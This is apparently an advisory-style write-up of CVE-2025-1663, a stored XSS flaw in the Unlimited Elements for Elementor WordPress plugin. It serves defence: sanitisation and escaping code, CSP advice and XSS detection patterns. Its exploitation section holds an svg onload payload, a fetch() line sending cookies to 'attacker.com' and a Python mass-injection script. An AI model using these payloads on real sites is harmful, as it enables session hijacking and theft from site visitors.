How CVE-2025-1663 Works
The Unlimited Elements For Elementor WordPress plugin (up to v1.5.142) fails to sanitize user inputs and escape outputs in multiple widgets. Authenticated attackers with Contributor-level access or higher can inject malicious JavaScript payloads into pages. When other users visit the compromised page, the script executes in their browser, enabling session hijacking, defacement, or malware distribution. The vulnerability stems from insecure handling of widget parameters, allowing arbitrary script embedding via unsanitized attributes.
DailyCVE Form:
Platform: WordPress
Version: ≤1.5.142
Vulnerability: Stored XSS
Severity: Medium
Date: 04/10/2025
What Undercode Say:
Exploitation:
1. Payload Injection:
< svg onload=alert(document.cookie)>
Insert via widget parameters (e.g., custom HTML/JS fields).
2. Exfiltrate Cookies:
fetch('https://attacker.com/steal?data='+btoa(document.cookie));
3. Mass Injection:
import requests wp_session = {'wordpress_logged_in': 'COOKIE'} payload = {'widget_param': '<script>malicious_code</script>'} requests.post('https://target.com/wp-admin/post.php', data=payload, cookies=wp_session)
Protection:
1. Update Plugin:
wp plugin update unlimited-elements-for-elementor
2. Input Sanitization:
$clean_input = sanitize_text_field($_POST['widget_param']);
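sanitize_text_field() on save is only half of the fix: the plugin also has to escape each widget parameter at output time with the escaper that matches its HTML context. The following PHP is an added example written for this page, not code from the Unlimited Elements plugin. It contains stand-ins for esc_attr(), esc_html() and sanitize_text_field() (guarded by function_exists so the file runs outside WordPress; the stand-ins are assumptions that approximate the real helpers in wp-includes) and shows a vulnerable widget renderer beside its hardened form, using the svg payload from the exploitation section as constructed input.

```php
<?php
// Added example for this page; not the plugin's own code.
// Stand-ins so the file runs outside WordPress. These are assumptions that
// approximate the real helpers: WordPress's esc_attr()/esc_html() are built on
// htmlspecialchars() with ENT_QUOTES, and sanitize_text_field() strips tags,
// control characters and surrounding whitespace (the real one does a bit more).
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_html')) {
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field(string $s): string {
        $s = strip_tags($s);
        $s = preg_replace('/[\x00-\x1F\x7F]/', '', $s);
        return trim($s);
    }
}

// Vulnerable pattern: a contributor-controlled parameter is concatenated
// straight into an attribute and into the element body.
function render_widget_vulnerable(array $params): string {
    return '<div class="' . $params['css_class'] . '">' . $params['title'] . '</div>';
}

// Hardened pattern, step 1: sanitize on save, so the stored value is plain text.
function save_widget_params(array $raw): array {
    return [
        'css_class' => sanitize_text_field($raw['css_class'] ?? ''),
        'title'     => sanitize_text_field($raw['title'] ?? ''),
    ];
}

// Hardened pattern, step 2: escape on output, per context. esc_attr() for an
// attribute value, esc_html() for a text node. This step is the decisive one:
// sanitize_text_field() alone leaves 'x" onmouseover="alert(1)' untouched
// because it contains no tags, so an unescaped attribute would still break out.
function render_widget_hardened(array $params): string {
    return '<div class="' . esc_attr($params['css_class']) . '">'
         . esc_html($params['title']) . '</div>';
}

// Constructed sample input (not real site data): the svg payload from the
// writeup plus an attribute breakout.
$constructed = [
    'css_class' => 'x" onmouseover="alert(1)',
    'title'     => '<svg onload=alert(document.cookie)>',
];

echo "vulnerable: ", render_widget_vulnerable($constructed), "\n";
echo "hardened:   ", render_widget_hardened(save_widget_params($constructed)), "\n";
```

If a widget legitimately accepts limited HTML (bold, links), the save step should use wp_kses_post() instead of sanitize_text_field() so the allow-list, not string stripping, decides which tags and attributes survive; inline event handlers and javascript: URLs are never on that list.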
3. Content Security Policy (CSP):
Header set Content-Security-Policy "default-src 'self'; script-src 'self'"
Do not add 'unsafe-inline' to script-src: it re-permits exactly the inline event-handler payloads this bug injects, so the policy would block nothing. Because WordPress themes and plugins often rely on inline scripts, deploy the policy as Content-Security-Policy-Report-Only first, move the inline scripts to nonces or hashes, and only then enforce it.
4. Firewall Rules:
location ~ /wp-content/plugins/unlimited-elements/ { deny all; }
Note what this does and does not do: nginx only refuses direct HTTP requests for files under that path. WordPress still loads the plugin's PHP server-side, so the rule blocks the plugin's static CSS/JS (breaking its widgets' styling) but does not stop an already stored payload from rendering. The effective stop-gap until the update lands is to deactivate the plugin (wp plugin deactivate unlimited-elements-for-elementor).
5. Log Monitoring:
grep -rEi "on[a-z]+=|javascript:" /var/www/html/wp-content/
(-E is required for | to mean alternation; without it grep searches for the literal string "onload=|javascript:".) Stored XSS payloads live in the database rather than on disk, so also search post content, adjusting the table prefix if it is not wp_:
wp db query "SELECT ID, post_author FROM wp_posts WHERE post_content REGEXP 'on[a-z]+=|javascript:'"
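The grep above is a coarse string match. The PHP below is an added example, not from the page or the plugin, of the same check done as detection logic with entity decoding and in-tag matching to cut false positives; it runs over constructed rows in the shape of wp_posts (ID, post_author, post_content are real wp_posts columns; the row values are made up), and on a live site the same functions would be applied to post content and to the widget settings the plugin stores.

```php
<?php
// Added example for this page; not code from the plugin or the writeup.
// Indicator patterns, matched case-insensitively and tolerant of whitespace.
// The event-handler pattern only fires inside a tag (<...on...=), so prose
// such as "onboarding page = step one" does not trigger it.
const XSS_INDICATORS = [
    'event_handler'  => '/<[^>]*\bon[a-z]+\s*=/i',   // <svg onload=..., <img onerror=...
    'javascript_uri' => '/javascript\s*:/i',          // href="javascript:..."
    'script_tag'     => '/<\s*script\b/i',
    'data_html_uri'  => '/data\s*:\s*text\/html/i',   // data:text/html,... URLs
];

// Returns the names of the indicators found in one piece of stored content.
function scan_content(string $content): array {
    // Decode entities first so an encoded variant such as &#106;avascript:
    // is seen as javascript: the way a browser would see it.
    $decoded = html_entity_decode($content, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $hits = [];
    foreach (XSS_INDICATORS as $name => $pattern) {
        if (preg_match($pattern, $decoded) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Runs scan_content() over rows shaped like wp_posts and keeps the matches,
// with the author ID so the triage can start from which account saved it.
function scan_rows(array $rows): array {
    $findings = [];
    foreach ($rows as $row) {
        $hits = scan_content($row['post_content']);
        if ($hits !== []) {
            $findings[] = [
                'ID'          => $row['ID'],
                'post_author' => $row['post_author'],
                'indicators'  => $hits,
            ];
        }
    }
    return $findings;
}

// Constructed sample rows (not real site data). 102 carries the svg payload
// from the writeup, 103 an entity-encoded javascript: URL, 101 and 104 are benign.
$rows = [
    ['ID' => 101, 'post_author' => 7, 'post_content' => '<p>Quarterly update, nothing unusual.</p>'],
    ['ID' => 102, 'post_author' => 9, 'post_content' => '<p>Hi</p><svg onload=alert(document.cookie)>'],
    ['ID' => 103, 'post_author' => 9, 'post_content' => '<a href="&#106;avascript:alert(1)">click</a>'],
    ['ID' => 104, 'post_author' => 3, 'post_content' => '<p>The onboarding page = step one.</p>'],
];

foreach (scan_rows($rows) as $f) {
    printf("post %d (author %d): %s\n", $f['ID'], $f['post_author'], implode(', ', $f['indicators']));
}
```

Treat hits as triage leads, not verdicts: a post can legitimately mention "onclick=" in a code sample, so review the flagged rows and check the saving account's role and recent activity before cleaning the content.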
6. Disable Contributor Scripts:
Leave wp_filter_post_kses in place: calling remove_filter() on it would switch KSES off and let contributors save raw markup, the opposite of what this step is meant to do. To make sure no role can bypass KSES through the unfiltered_html capability, add to wp-config.php:
define('DISALLOW_UNFILTERED_HTML', true);
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-1663
Extra Source Hub:
Undercode